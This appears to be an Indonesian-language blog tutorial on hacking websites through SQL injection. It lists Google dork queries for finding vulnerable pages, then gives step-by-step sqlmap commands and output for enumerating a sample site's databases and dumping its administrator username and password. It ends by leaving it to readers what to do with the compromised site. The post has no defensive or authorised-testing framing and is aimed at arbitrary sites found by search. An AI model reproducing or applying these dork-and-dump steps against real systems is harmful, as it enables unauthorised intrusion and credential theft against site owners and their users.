ok langsung saja, tidak perlu banyak basa-basi lagi
Cari target menggunakan google dorks
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
dan masih banyak lagi yang lainnya. Jika target sudah di temukan, buka sqlmap, lokasinya di:
Application – Backtrack – Exploitation Tools – Web Exploitation Tools – SqlmapPentest target menggunakan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 --dbs
- -u = url
- --dbs = untuk mencari database
Output:
available databases [2]:
[*] dede
[*] information_schema
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede --tables
- -D = nama database yang kita temukan tadi
- --tables = mencari nama tables
Output:
Database: dede
[3 tables]
+------------------------------+
| access_log |
| administrators |
| menus |
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators --columns
- -T = nama tables
- --columns = mencari nama columns
Output:
[2 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| admin_login | text |
| admin_passwd | text |
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators -C admin_login --dumpjika sudah mendapatkan nama username, lanjut dengan mencari password dari username tersebut:
Output:
+--+
| admin-login |
+--+
|dedetampan|
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators -C admin_passwd --dumpnah kalau sudah begini, sekarang terserah kalian mau di buat apa website tersebut
Output:
+--+
| admin-passwd |
+--+
|tb-cyber|
Vidionya menyusul, berhubung durasinya lumayan lama, jadi malas upload ke youtube
0 komentar:
Posting Komentar